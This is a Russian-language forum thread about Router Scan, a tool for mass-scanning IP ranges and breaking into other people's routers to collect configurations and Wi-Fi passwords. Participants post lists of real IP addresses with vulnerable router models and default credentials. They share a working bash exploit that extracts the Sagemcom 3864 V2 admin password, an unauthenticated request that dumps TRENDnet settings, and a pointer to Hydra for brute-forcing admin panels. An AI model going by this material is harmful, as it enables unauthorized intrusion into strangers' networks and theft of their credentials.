Ну так вы ведь включили дополнительные модули. А они напрямую с роутерами не связаны (за исключением HNAP).

ChesteRock
13.08.2015, 19:36
Ну так вы ведь включили дополнительные модули. А они напрямую с роутерами не связаны (за исключением HNAP).



То есть их можно отключить? Не нашел их описания.

binarymaster
13.08.2015, 19:48
То есть их можно отключить? Не нашел их описания.



Их официального описания и правда нет, хотя можно найти в комментариях у меня на сайте, и здесь где-то в теме наверняка тоже. Они включаются/отключаются прямо из главного окна.

Вообще рекомендую сначала изучить все кнопки, а потом сканировать, а то мало ли каких бед можно натворить

vedemur
13.08.2015, 21:35
Доброго вечера всем. Заинтересовала меня прога RouterScan, немног почитал этот пост, но не всё ещё понимаю. Научите (помогите) пж как расписать для ranges IP, например такие: 193.0.0.0 - 195.255.255.255, 94.130.96.0-94.130.103.255. Заранее благодарен.

Triton_Mgn
13.08.2015, 21:51
Доброго вечера всем. Заинтересовала меня прога RouterScan, немног почитал этот пост, но не всё ещё понимаю. Научите (помогите) пж как расписать для ranges IP, например такие: 193.0.0.0 - 195.255.255.255, 94.130.96.0-94.130.103.255. Заранее благодарен.



В смысле расписать? добавляйте 2 диапазона и вперед. Все работает. Первый не расписывается, второй 94.130.96.0/21, Киев Ukraine.

vedemur
13.08.2015, 22:57
Спасибо, это IRBIS Ивано-Франковск. Диапазон 94.130.96.0-94.130.103.255 не пойму почему 94.130.96.0/21 и как это делается, почему не 0/24.

VladimirV
13.08.2015, 23:09
Спасибо, это IRBIS Ивано-Франковск. Диапазон 94.130.96.0-94.130.103.255 не пойму почему 94.130.96.0/21 и как это делается, почему не 0/24.



здесь почитайте: https://ru.wikipedia.org/wiki/Маска_подсети

CRACK211
14.08.2015, 17:14
А нет ли смысла добавить в программу список роуторов которые программа может вскрыть 100% и список роуторов которых она на 100% не может вскрыть для ускорения процесса?что бы программа не тратила время и ресурс железа и пользователя для вскрытия точки заведомо зная что она не (откроется) а тех что не попали в список пробовать вскрыть)а те роутеры которые в (белом списке) и по какой то причине не получилось получить доступ про сканировать еще раз после основного сканирования.и если можно добавить отправку лог файла на сайт для ведения статистики какие роутеры попадаются часто и которые еще не поддерживается для добавления в белый или черный список.

Ossen
14.08.2015, 17:18
А нет ли смысла добавить в программу список роуторов которые программа может вскрыть



На сайте же висит список роутеров .

binarymaster
14.08.2015, 18:44
100% уверенности с точками доступа нет никогда. Для всего остального есть фильтры. Если хотите, можете попробовать составить такой список правил, который отсеивал всё не нужное, но при этом не затрагивал полезное. Мне кажется, универсального списка нет, каждому нужно своё.

binarymaster
14.08.2015, 21:29
Кто-нибудь знает способы вытаскивания конфигурации из точек NETGEAR WG602v3 и WG602v4 по HTTP?

Они скрывают пароли беспроводной сети за звёздочками (на уровне исходника страницы), а также в них отсутствуют видимые способы сдампить файл конфига.

По факту Router Scan обрабатывает их, но пароль сети достать не может. Если кто копал прошивки этих устройств, прошу подсказать.

Payer
14.08.2015, 23:11
Отправил личкой, как я нашел пароли за звездами

Triton_Mgn
15.08.2015, 04:12
А нет ли смысла добавить в программу список роуторов которые программа может вскрыть 100% и список роуторов которых она на 100% не может вскрыть для ускорения процесса?что бы программа не тратила время и ресурс железа и пользователя для вскрытия точки заведомо зная что она не (откроется) а тех что не попали в список пробовать вскрыть)а те роутеры которые в (белом списке) и по какой то причине не получилось получить доступ про сканировать еще раз после основного сканирования.и если можно добавить отправку лог файла на сайт для ведения статистики какие роутеры попадаются часто и которые еще не поддерживается для добавления в белый или черный список.



Если Вы не хотите тратить ресурс железа, обратитесь к Нео Шпион, расставьте запятые и объясните ,что есть black list или white/? как Вы себе предствляете отправку статистики - мимо касперского ну или nod32?

Ossen
15.08.2015, 05:04
Попутно думаю нужно бы исправить маленький косяк в роутерскане который проявляется при отправке результатов сканирования на http://3wifi.tk/

так как если там в момент отправки возникла проблема то остановить (закрыть окошко отправки) без потери результатов сканирования не представляется возможным так как приходится принудительно закрывать роутерскан через диспетчер

CRACK211
15.08.2015, 10:07
Если Вы не хотите тратить ресурс железа, обратитесь к Нео Шпион, расставьте запятые и объясните ,что есть black list или white/? как Вы себе предствляете отправку статистики - мимо касперского ну или nod32?



А что здесь не понятного? В black list входят точки которые Routerscan не может открыть, а раз он не может то и смысла нет пробовать. В white лист входят точки которые Routerscan 100% может открыть. После сканирования программа проверяет точки. И если есть точки которые находятся в white листе но по каким то причинам не были открыты пробует еще раз про сканировать такие точки. А статистику отправлять так же как и на http://3wifi.tk/. Касперский мешает отправлять ГУДЫ на этот сайт? Я просто не пользуюсь антивирусами)

Triton_Mgn
15.08.2015, 10:39
Попутно думаю нужно бы исправить маленький косяк в роутерскане который проявляется при отправке результатов сканирования на http://3wifi.tk/

так как если там в момент отправки возникла проблема то остановить (закрыть окошко отправки) без потери результатов сканирования не представляется возможным так как приходится принудительно закрывать роутерскан через диспетчер



По этому лучше сохранить goog result таблицу в формате CSV и делать с ней какие угодно вещи, вплоть изучения наизусть

binarymaster
15.08.2015, 16:31
Попутно думаю нужно бы исправить маленький косяк в роутерскане который проявляется при отправке результатов сканирования на http://3wifi.tk/

так как если там в момент отправки возникла проблема то остановить (закрыть окошко отправки) без потери результатов сканирования не представляется возможным так как приходится принудительно закрывать роутерскан через диспетчер



Да, сам вчера обнаружил этот баг. Исправил.

alian
15.08.2015, 16:55
Блин, не смог удержаться, улыбнуло (из лога Routerscan) - "Apache/2.2.22 (Debian) (Prof-Trade | Ножнички там всякие, бигуди)"

Felis-Sapiens
15.08.2015, 17:59
D-Link DIR-640L (Hardware Version: A2, Firmware Version : 1.00RU)

https://46.188.7.56/

D-Link DIR-330 (Firmware Version: 1.23)

https://79.120.1.12/

http://81.88.117.21/

D-Link DIR-130 (Firmware Version: 1.22, 1.24)

http://78.24.177.90/

http://78.24.176.50/

TRENDnet N150 Wireless Router TEW-712BR

http://83.167.124.78:8080/

Sapido BR261c AC 750Mbps Dual-Band Wireless Router

http://46.188.3.34/

LevelOne SC1B7346, firmware: Version 1.0 Release 12

(определяется, но не парсит данные)

http://62.118.136.193/

Akado (Technicolor)

defaults: admin/admin

http://46.39.40.30:8080/

http://46.39.44.72:8080/

http://83.167.127.20:8080/

pfSense

https://81.88.117.156/

https://83.167.105.111/

https://83.167.115.45/

https://92.243.171.46/

https://92.243.185.79/

TP-Link

http://46.39.40.96/

По поводу MikroTik'ов уже когда-то писал на сайте RouterScan'а; хорошо бы доделать, а то 6-ую версию неправильно парсит: https://yadi.sk/i/UGSyALw6iTrLK

Вот, на всякий случай, несколько примеров:

v6.22 http://[email protected]/

v6.27 http://[email protected]/

v5.24 http://[email protected]/

x_admin_x
16.08.2015, 00:56
Прошу рассмотреть на добавление такой тип роутеров Huawei Technologies HG8245A/HG8240A

в реале называется терминал GPON EchoLIfe HG82240A/HG8245A

пс: вроде в списках не нашел.

henri2002
16.08.2015, 12:27
Address: http://77.121.225.141/Time: 16 ms

Device: TP-LINK TL-WR841N

Address: http://77.121.225.164/Time: 0 ms

Device: TP-LINK TL-WR740N

Address: http://77.121.225.203:8081/Time: 16 ms

Device: TP-LINK TL-WR340G

Address: http://77.121.225.205/Time: 15 ms

Device: MikroTik RouterOS v6.29.1

Address: http://77.121.227.52/Time: 0 ms

Device: TP-LINK TL-WR741N

Address: http://77.121.227.121/Time: 15 ms

Device: D-Link DIR-300NRU rev.B6

Address: http://77.121.227.164/Time: 0 ms

Device: TP-LINK TL-WR740N

Address: http://77.121.227.211/Time: 250 ms

Device: ASUS WL-520gC

Address: http://77.121.228.21/Time: 31 ms

Device: TP-LINK TL-WR720N

Address: http://77.121.228.35:8081/Time: 15 ms

Device: RT-N10E

Address: http://77.121.229.220:8081/Time: 156 ms

Device: RT-N10E

Address: http://77.121.231.60/Time: 32 ms

Device: TP-LINK TL-WR841N

Address: http://77.121.232.46/Time: 0 ms

Device: TP-LINK TL-WR740N

Address: http://77.121.232.86/Time: 16 ms

Device: TP-LINK TL-WR720N

Address: http://77.121.232.200/Time: 32 ms

Device: TP-LINK TL-WR740N

Address: http://77.121.233.8/Time: 0 ms

Device: ASUS RT-N11P

LAN IP: 192.168.1.1

LAN Subnet Mask: 255.255.255.0

Address: http://77.121.233.8:8080/Time: 0 ms

Device: ASUS RT-N11P

LAN IP: 192.168.1.1

LAN Subnet Mask: 255.255.255.0

Address: http://77.121.233.143/Time: 0 ms

Device: TP-LINK TL-WR740N

Address: http://77.121.234.235/Time: 0 ms

Device: TP-LINK TL-WR740N

Address: http://77.121.235.33/Time: 0 ms

Device: TP-LINK TL-WR340G

уязвимости не сработали.

binarymaster
16.08.2015, 16:51
Ребят, когда я вижу большое кол-во IPшников в заказах на добавление, меня это отпугивает и снижает мотивацию. Выкладывайте маленькими порциями

Ну а по делу - мне сегодня вечером нужно будет переключиться на другой проект. Пока занимаюсь правками в коде GUI.

Ossen
16.08.2015, 17:03
мне сегодня вечером нужно будет переключиться на другой проект.



Может пока текущую бетку потестим ?

binarymaster
16.08.2015, 17:43
TRENDnet N150 Wireless Router TEW-712BR

http://83.167.124.78:8080/



Отдаёт настройки без авторизации


POST /my_cgi.cgi HTTP/1.1

request=no_auth&request=load_settings&table_name=fw_ver&table_name=wan_info&table_name=lan_info&table_name=wireless_info

alian
16.08.2015, 19:14
По окну программы пожелание, чтоб при закрытии программы сохранялись его размер и расположение на экране монитора.

СПС заранее.

binarymaster
16.08.2015, 20:48
По поводу MikroTik'ов уже когда-то писал на сайте RouterScan'а; хорошо бы доделать, а то 6-ую версию неправильно парсит: https://yadi.sk/i/UGSyALw6iTrLK

Вот, на всякий случай, несколько примеров:

v6.22 http://[email protected]/

v6.27 http://[email protected]/

v5.24 http://[email protected]/



Последний отпарсился корректно, когда я зашёл и вышел при помощи браузера. Кстати, если я не обознался, именно вы помогли мне тогда написать парсер для Mikrotik.

Felis-Sapiens
16.08.2015, 21:51
Последний отпарсился корректно, когда я зашёл и вышел при помощи браузера. Кстати, если я не обознался, именно вы помогли мне тогда написать парсер для Mikrotik.



Все правильно - последний ip это MikroTik с ОС v5.24, они парсились нормально. Я его привел, чтобы можно было проверить, что ничего не сломалось. Структура данных изменилась с версии 6.8 или 6.9.

И да, вы не обознались

hunt.lsk
17.08.2015, 00:42
Что нового в программе? Что добавлено?

pte273
17.08.2015, 18:45
Что то не пойму что на 25 порте?http://s015.radikal.ru/i333/1508/2f/dfeefbe0fafe.png

binarymaster
17.08.2015, 21:03
Что нового в программе? Что добавлено?



Как релиз будет, всё напишу.



Что то не пойму что на 25 порте?



25/tcp - SMTP, почтовые серверы. Их нет особого смысла сканировать, у них свой протокол отличный от HTTP.

http://s7.hostingkartinok.com/uploads/thumbs/2015/08/328d723ac77776288c959a1651d3e845.png

Лично у меня на этих адресах нет подобного эффекта, порты закрыты. Скорее всего так работает ваш антивирус, брандмауэр или что-то ещё.

pte273
17.08.2015, 21:32
Как релиз будет, всё напишу.

25/tcp - SMTP, почтовые серверы. Их нет особого смысла сканировать, у них свой протокол отличный от HTTP.

http://s7.hostingkartinok.com/uploads/thumbs/2015/08/328d723ac77776288c959a1651d3e845.png

Лично у меня на этих адресах нет подобного эффекта, порты закрыты. Скорее всего так работает ваш антивирус, брандмауэр или что-то ещё.



Точно антивирус шалит

user100
18.08.2015, 10:46
Новый сплойт по получению паролей с вэбиморды роутера Sagemcom 3864 V2 (таких много есть у Ростелекома)


#!/bin/bash
#########################################
# Exploit Title: Sagemcom 3864 V2 get admin password
# Date 2015-08-15
# Author: Cade Bull
# Software Link: null
# Tested on: Sagemcom F@ST 3864 V2
# Version: 7.253.2_F3864V2_Optus
#########################################

# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials
if [ "$1" != "" ]
then
IP_ADDRESS="$1"
else
echo "Usage : $0 IP_ADDRESS"
exit 1
fi
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O - | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `
echo "admin password = $USER_PASSWORD"
Может возможно его запилить в RouterScan.

XAMRAS
18.08.2015, 13:15
А можно в Router Scan сделать ручное(пользовательское) редактирование столбцов(поменять столбцы местами(IP, MAC и т.п.)).

binarymaster
18.08.2015, 13:28
Новый сплойт по получению паролей с вэбиморды роутера Sagemcom 3864 V2 (таких много есть у Ростелекома)

Может возможно его запилить в RouterScan.



Да, вполне можно. Очень похожая уязвимость есть в ZTE ZXDSL 831AII/CII и она уже реализована.

Danilka
18.08.2015, 13:57
У меня в локалке часто встречается GoAhead-Webs (Web management System)

Перехожу по айпи, открывается страничка с приглашением ввода логина пароля и лейбл QTECH

Никто не знает что это такое?

Vikhedgehog
18.08.2015, 16:57
Кто нидь знает что это?

62.33.0.0/16

Closed Joint Stock Company Transtelecom

Роутеры на ней встречаются, но крайне редко.

zimmer
18.08.2015, 20:13
Кто нидь знает что это?

62.33.0.0/16

Closed Joint Stock Company Transtelecom

Роутеры на ней встречаются, но крайне редко.



вроде же хостер это, по той же ссылке там есть список сайтов http://myip.ms/browse/sites/1/ownerID/419718/ownerIDii/419718

zimmer
18.08.2015, 20:15
У меня в локалке часто встречается GoAhead-Webs (Web management System)

Перехожу по айпи, открывается страничка с приглашением ввода логина пароля и лейбл QTECH

Никто не знает что это такое?



вот сайт этого бренда http://www.qtech.ru/, кстати отечественный он

чтобы больше сказать что в твоём конкретно случае за железка стоит - то или дай больше информации или как минимум айпишник в студию!!!!

Forserer
18.08.2015, 21:19
Парни, это все конечно хорошо, куча роутеров и прочих игрушек найти можно. проблема в другом, как быть с админками у которых пароль сложнее чем admin )) есть ли софт какой то для брута web админки? в идеале с поддержкой прокси, работой по маске словарю)))) Знаю "мечтать не вредно" но возможно что то есть похожее?

binarymaster
19.08.2015, 01:05
Кто нидь знает что это?

62.33.0.0/16

Closed Joint Stock Company Transtelecom

Роутеры на ней встречаются, но крайне редко.



62.33.0.0/20 -> AS20485 -> ТрансТелеКом (ТТК)

Такой вот провайдер. Одной из причин, почему роутеры встречаются редко, может быть наличие у них внутренней сети, а внешку раздают "избранным" (это моя гипотеза).

binarymaster
19.08.2015, 01:08
А можно в Router Scan сделать ручное(пользовательское) редактирование столбцов(поменять столбцы местами(IP, MAC и т.п.)).



Не, менять местами столбцы не получится, технически сложно реализовать (там всё привязано к потокам).

zimmer
19.08.2015, 07:08
Парни, это все конечно хорошо, куча роутеров и прочих игрушек найти можно. проблема в другом, как быть с админками у которых пароль сложнее чем admin )) есть ли софт какой то для брута web админки? в идеале с поддержкой прокси, работой по маске словарю)))) Знаю "мечтать не вредно" но возможно что то есть похожее?



гидра всё поддерживает что ты перечислил..

вот ссылка на последнюю версию под винду https://cloud.mail.ru/public/9beP/bwKgz6bem

по поводу как её заюзать - в гугле куча примеров на русском

ObamaSS
19.08.2015, 09:28
добрый день.

я работаю с Router Scan но у меня есть только мак-адреса ((

можете подсказать программу или сайт где по мак узнать ЙП и использовать Router Scan.

спасибо

Forserer
19.08.2015, 11:34
гидра всё поддерживает что ты перечислил..

вот ссылка на последнюю версию под винду https://cloud.mail.ru/public/9beP/bwKgz6bem

по поводу как её заюзать - в гугле куча примеров на русском



А это уже интересно, она под Unix или есть под Win ?

V777
19.08.2015, 12:05
добрый день.

я работаю с Router Scan но у меня есть только мак-адреса ((

можете подсказать программу или сайт где по мак узнать ЙП и использовать Router Scan.

спасибо



Не, ну ты хоть соображаешь, шо ты тут мелешь ? Ты хоть понимаешь , что такое мак адрес , а что такое айпи ?

zimmer
19.08.2015, 16:48
А это уже интересно, она под Unix или есть под Win ?



вообще под юникс (скачать можно на сайте разработчика, под винду ссылка что выложил выше)

attilla
19.08.2015, 18:06
https://yadi.sk/i/4binQmwoiY9wd

Доброго дня

Народ кто нибудь может подсказать почему такая шляга .....

alian
19.08.2015, 21:04
62.33.0.0/20 -&gt; AS20485 -&gt; ТрансТелеКом (ТТК)

Такой вот провайдер. Одной из причин, почему роутеры встречаются редко, может быть наличие у них внутренней сети, а внешку раздают "избранным" (это моя гипотеза).



Так и есть. В моём городе весь ТТК сидит за НАТом. Белый IP дают за 150 рэ в месяц. Вот поэтому из инета их и не видно. И не факт, что локалка у ни есть.

binarymaster
19.08.2015, 22:14
https://yadi.sk/i/4binQmwoiY9wd

Доброго дня

Народ кто нибудь может подсказать почему такая шляга .....



Локальная сеть Билайна? Unknown - это, с большой вероятностью, компы со скайпами. В остальном, ничего особенного, некоторые внутренние диапазоны слабо заполнены роутерами.

C0D3BR34K3R
20.08.2015, 02:14
https://yadi.sk/i/4binQmwoiY9wd

Доброго дня

Народ кто нибудь может подсказать почему такая шляга .....



убрать галку с Detect proxy servers - нет там в сетке никаких проксей

поставить галку Use HNAP 1.0 - хосты с именем GoAhead-Webs должны парсится через этот эксплоит

убрать 23-й порт - роутерскан через него ничего не напарсит,

также убрать 443-й порт - сомневаюсь, что роутерскан работает с зашифрованными протоколами

роутеры dir-300 по идее должны парситься через этот эксплоит:

см. Уязвимость #1 http://habrahabr.ru/post/243997/

не знаю только, реализован ли он в роутерскане

MaxPain83
20.08.2015, 16:09
Ни кто не в курсе есть ли у МГТС локальная сеть? Или как это можно определить?

binarymaster
20.08.2015, 17:08
см. Уязвимость #1 http://habrahabr.ru/post/243997/

не знаю только, реализован ли он в роутерскане



В том то и дело, что нету. Нужны опытные образцы, и желательно HTTP запрос в правильном виде.



Ни кто не в курсе есть ли у МГТС локальная сеть? Или как это можно определить?



https://forum.antichat.ru/posts/3804147

MaxPain83
20.08.2015, 22:51
Спасибо,помогло) Теперь другой вопрос,подключение pppoe....пока я подключен то сам имею локальный адрес (причем динамический) вижу роутеры в своей сети,как только отключаюсь то не вижу ни кого и сам остаюсь без ip,тупо присосаться,как в статье выше нельзя. Использовать чужой логин-пароль мега-палево. Вообщем есть варианты,кроме wifi (которых к слову рядом нет)?

binarymaster
21.08.2015, 03:28
База 3WiFi переехала сюда:

http://3wifi.stascorp.com/

Для тех, кто использует бета версию, поправьте в INI файле:


Upload.Server=http://3wifi.stascorp.com/upload.php

Ossen
21.08.2015, 03:44
Для тех, кто использует бета версию, поправьте в INI файле:



Проверил файл загрузило нормально